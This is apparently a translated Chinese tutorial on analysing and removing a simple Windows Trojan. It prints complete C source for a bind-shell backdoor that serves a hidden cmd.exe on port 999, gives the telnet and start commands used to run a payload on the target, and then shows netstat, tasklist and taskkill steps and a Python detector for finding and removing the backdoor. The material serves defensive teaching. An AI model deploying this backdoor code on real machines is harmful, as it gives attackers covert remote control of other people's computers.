Anti-Virus Attack and Defense Research: simple Trojan Analysis and Prevention part1

Source: Internet
Author: User

I. Preface
The technologies behind viruses and Trojan horses have developed in parallel and borrow freely from each other, so the boundary between the two is no longer clear: each often uses the other's techniques to achieve its own goals, and today they are frequently grouped together under the name "malicious code". I plan to use two articles to discuss how a virus can be combined with a simple Trojan, and how to analyze and defend against that combination. This first article discusses how a server-side Trojan program can be used to start a virus. In the next article I will discuss the analysis and prevention of a Trojan with both server and client sides combined with a virus.

II. Principle of simple Trojans
Trojan technology is closely tied to computer networks, so Socket programming is indispensable. I will not go into the details of Socket programming here; MSDN describes it in depth, and in practice it is little more than filling in the relevant parts of a "template" that follows the Socket programming flow. To communicate, both sides must follow a communication model, and Trojans generally use the C/S (Client/Server) model. Although this article does not involve writing a client (I simply treat the cmd program as the client), the program discussed here is still essentially in the C/S mode.
In the C/S model, the server (the computer being attacked) binds an IP address and a port number, then listens and waits for a connection from the client (the attacker). The client initiates a connection to that IP address and port; once the server accepts the connection, both parties can communicate. This is TCP-based communication and is the method used below. There is also a UDP-based method, in which once the server is bound the client can send data to it directly without establishing a connection. TCP is thus more reliable than UDP, while UDP is more efficient than TCP.
The basic principle of the server-side programming described in this article is as follows:
1. Open a channel (bind a port) and tell the local host to receive client requests at a specific address: the socket and bind functions.
2. Wait for client requests to arrive on this port: the listen function.
3. Receive a service request, process it, and send a response: the accept function.
4. Return to step 2 and wait for requests from other clients.
5. Close the connection: the closesocket function.
The functions are therefore called in this order:
socket() → bind() → listen() → accept() → closesocket()
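The same five-step sequence, run as a benign loopback echo service in Python (an added example, not the article's code; the article's program is written against Winsock in C, but the socket() → bind() → listen() → accept() → close() flow is identical). Port 0 lets the operating system choose a free port, and the client side is a plain connect/send/recv loop. From a defender's point of view, a process sitting in step 2 is exactly what a LISTENING row in netstat output represents.

```python
"""socket() -> bind() -> listen() -> accept() -> close(), as a loopback echo server.

Added example: a harmless echo service used only to show the call order; the
host, port 0 and the b"echo: " prefix are choices made for this demo.
"""
import socket
import threading


def serve(ready, log, n_clients, host="127.0.0.1"):
    """Server side: the five steps listed in the article, for n_clients connections."""
    # Step 1: open a channel and bind it to a local address and port (socket + bind).
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))                      # port 0: let the OS choose a free port
    # Step 2: wait for requests to arrive on that port (listen).
    srv.listen(1)
    ready["port"] = srv.getsockname()[1]
    ready["event"].set()                     # tell the client which port was chosen
    for _ in range(n_clients):               # Step 4: go back and wait for the next client
        # Step 3: accept the request, process it, send a response.
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(1024)
            conn.sendall(b"echo: " + data)
            log.append((peer[0], data))
    # Step 5: close the listening socket (closesocket on Windows).
    srv.close()


def run_demo(messages):
    """Client side: connect once per message and collect the server's replies."""
    ready = {"event": threading.Event()}
    log = []
    server = threading.Thread(target=serve, args=(ready, log, len(messages)), daemon=True)
    server.start()
    if not ready["event"].wait(timeout=5):
        raise RuntimeError("server did not start")
    replies = []
    for msg in messages:
        with socket.create_connection(("127.0.0.1", ready["port"]), timeout=5) as cli:
            cli.sendall(msg)
            replies.append(cli.recv(1024))
    server.join(timeout=5)
    return replies, log


if __name__ == "__main__":
    print(run_demo([b"hello", b"world"]))
```

Each client connection is served by one pass through step 3, and the loop in serve() is the "return to step 2" of the list above; the listening socket is only closed after the last client has been handled.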

III. Trojan programming
When the server runs this program, the client can use telnet to connect to the server. After the connection succeeds, a cmd window is opened automatically on the server side, and the client can use DOS commands to control the target computer directly. The code is as follows:

#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#include <windows.h>

#define MasterPort 999    // the port number the server listens on

int main()
{
    WSADATA WSADa;
    sockaddr_in SockAddrIn;
    SOCKET CSocket, SSocket;
    int iAddrSize;
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo;
    char szCMDPath[255];

    // initialize data
    ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
    ZeroMemory(&StartupInfo, sizeof(STARTUPINFO));
    ZeroMemory(&WSADa, sizeof(WSADATA));

    // obtain the cmd path
    GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));

    // load ws2_32.dll
    WSAStartup(0x0202, &WSADa);

    // set the local address information and create the socket
    SockAddrIn.sin_family = AF_INET;
    SockAddrIn.sin_addr.S_un.S_addr = INADDR_ANY;
    SockAddrIn.sin_port = htons(MasterPort);
    CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

    // bind the port
    bind(CSocket, (sockaddr *)&SockAddrIn, sizeof(SockAddrIn));

    // listen on the bound port
    listen(CSocket, 1);
    iAddrSize = sizeof(SockAddrIn);

    // accept the remote connection and configure the hidden window
    SSocket = accept(CSocket, (sockaddr *)&SockAddrIn, &iAddrSize);
    StartupInfo.cb = sizeof(STARTUPINFO);
    StartupInfo.wShowWindow = SW_HIDE;
    StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    StartupInfo.hStdInput = (HANDLE)SSocket;
    StartupInfo.hStdOutput = (HANDLE)SSocket;
    StartupInfo.hStdError = (HANDLE)SSocket;

    // create the cmd process with the accepted socket as its standard handles
    CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);
    WaitForSingleObject(ProcessInfo.hProcess, INFINITE);

    // close the process handles
    CloseHandle(ProcessInfo.hProcess);
    CloseHandle(ProcessInfo.hThread);

    // close the sockets
    closesocket(CSocket);
    closesocket(SSocket);

    // release the ws2_32.dll dynamic link library
    WSACleanup();
    return 0;
}

The code is straightforward and will not be analyzed further here.

IV. Combination of Trojans and viruses

The self-starting method of the "virus" discussed in the previous article required "external force"; this time my "virus" is implanted by the Trojan: after the connection succeeds, a DOS command is entered to start it, the precondition being that the Trojan has been started first. Here I used two computers (or virtual machines): one is the client, the other is the server, and the Trojan program has already been placed on the server. Now I run the Trojan on the server, then open the cmd program on the client and enter:

    telnet 192.168.1.107 999

This command logs on remotely through telnet, connecting to port 999 on the computer with IP address 192.168.1.107. After the connection succeeds, you can see that you are connected to the other party's computer:

Figure 1 connect to a remote computer

At this point you can use DOS commands to control the target computer. In this case the target computer's E: drive holds the hacked.exe program compiled previously, which can be run by entering the following command:

    start e:\hacked.exe

hacked.exe is then executed on the target computer, as shown below:

Figure 2 start hacked.exe on the target computer

The program could also be uploaded from the client to the server and then started. However, because this method is dangerous, I will not discuss it in depth, to avoid people with ulterior motives putting it to bad use. My principle has always been to discuss how to better prevent malicious programs, and to take the implementation of malicious code only as far as is needed to make the point; there is no need to discuss it further.

V. Trojan detection and removal

The code above implements a simple forward-connection (bind) backdoor with no process hiding and no startup entry. In other words, when the server computer restarts this Trojan stops working and has to be run again. Here I will describe how to find and remove it manually. After the server has been implanted with the Trojan, open cmd on the server (if cmd has been image-hijacked, refer to my previous article) and enter the following command:

    netstat -ano

This command shows the current network connection status:

Figure 3 network connection status

As the figure shows, local port 999 has a TCP connection established with the host whose IP address is 192.168.1.104, and the process ID is 1292 (the PID of each Trojan may be different). For ordinary Trojans, this "finding" step can be done at the command prompt. As the discussion goes deeper and Trojans become more complex, I may use professional or self-made tools to implement the "finding" function.

The PID value can be used to look up the process's file name; enter:

    tasklist | find "1292"

This tells us that the process with PID 1292 is "minitrojan.exe". The Trojan process can then be terminated by its PID, using the taskkill command:

    taskkill /f /pid 1292 /t

This command forcibly (/f) terminates the process with PID 1292 and any child processes it started (/t). The last step is to locate minitrojan.exe on disk and delete it, so that the Trojan is completely removed from the computer.
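The netstat → tasklist → taskkill procedure above can be scripted so that it does not depend on reading one PID off the screen. The following Python is an added example, not part of the article: it parses the text that `netstat -ano` and `tasklist` print on Windows, correlates listening sockets with the owning image name, and flags any TCP listener on a port that is not in a baseline allowlist. The two outputs are constructed samples embedded in the script (modelled on the figures described above, with PID 1292 and port 999), the baseline port set is a hypothetical choice for the host, and nothing is executed on the machine; the script only reports the taskkill command that the manual procedure would run.

```python
"""Correlate `netstat -ano` with `tasklist` to spot an unexpected TCP listener.

Added example: runs offline over constructed sample output; it does not invoke
netstat, tasklist or taskkill itself, it only reproduces the manual steps.
"""
import re
from dataclasses import dataclass

# Constructed sample of `netstat -ano` output (not captured from a real host).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       856
  TCP    0.0.0.0:999            0.0.0.0:0              LISTENING       1292
  TCP    192.168.1.107:999      192.168.1.104:49213    ESTABLISHED     1292
  TCP    [::]:135               [::]:0                 LISTENING       856
  UDP    0.0.0.0:500            *:*                                    1120
"""

# Constructed sample of `tasklist` output (not captured from a real host).
TASKLIST_SAMPLE = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
svchost.exe                    856 Services                   0     10,232 K
lsass.exe                     1120 Services                   0     12,004 K
minitrojan.exe                1292 Console                    1      2,340 K
"""

# Hypothetical baseline: TCP ports this host is expected to listen on.
BASELINE_TCP_PORTS = {135, 445, 3389}


@dataclass
class Conn:
    proto: str
    local_port: int
    foreign: str
    state: str
    pid: int


def parse_netstat(text):
    """Turn netstat -ano rows into Conn records; UDP rows have no State column."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            proto, local, foreign, state, pid = parts[:5]
        else:
            proto, local, foreign, pid = parts[:4]
            state = ""
        port = int(local.rsplit(":", 1)[1])   # works for 0.0.0.0:999 and [::]:135
        conns.append(Conn(proto, port, foreign, state, int(pid)))
    return conns


# Image names may contain spaces ("System Idle Process"), so anchor on the tail.
TASKLIST_ROW = re.compile(r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")


def parse_tasklist(text):
    """Map PID -> image name from tasklist output."""
    pid_to_image = {}
    for line in text.splitlines():
        m = TASKLIST_ROW.match(line.strip())
        if m:
            pid_to_image[int(m.group("pid"))] = m.group("image")
    return pid_to_image


def find_unexpected_listeners(netstat_text, tasklist_text, baseline=BASELINE_TCP_PORTS):
    """Report TCP listeners outside the baseline, with owner image and live peers."""
    conns = parse_netstat(netstat_text)
    images = parse_tasklist(tasklist_text)
    findings = []
    for c in conns:
        if c.proto == "TCP" and c.state == "LISTENING" and c.local_port not in baseline:
            peers = sorted({o.foreign for o in conns
                            if o.pid == c.pid and o.state == "ESTABLISHED"
                            and o.local_port == c.local_port})
            findings.append({
                "pid": c.pid,
                "image": images.get(c.pid, "<unknown>"),
                "port": c.local_port,
                "peers": peers,
                # Same remediation the article performs by hand: kill the PID and its children.
                "kill_cmd": f"taskkill /f /pid {c.pid} /t",
            })
    return findings


if __name__ == "__main__":
    for f in find_unexpected_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"PID {f['pid']} ({f['image']}) listens on TCP {f['port']}; "
              f"peers={f['peers']}; suggested: {f['kill_cmd']}")
```

On a real machine the two sample strings would be replaced by the captured output of the two commands; the baseline set is the part that must be tuned per host, since a listener on an unusual port is only suspicious relative to what the machine is supposed to run. As the summary notes, the process is terminated before the image file is deleted, which is why the report names both the PID and the image.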


VI. Summary

The Trojan program in this article has to be driven from cmd. Although the remote interface is intuitive, even such a small Trojan can pose a serious threat. It is, after all, only a "pony" (a small Trojan), and it can be detected and removed with a few simple DOS commands, which is still a good solution. In fact, manual detection and removal of viruses and Trojans generally works like this; it often requires experience and a keen nose. In the "killing" phase that follows, the virus or Trojan process should be terminated first, and only then is the main program file deleted. This principle basically applies even to complex malicious programs.
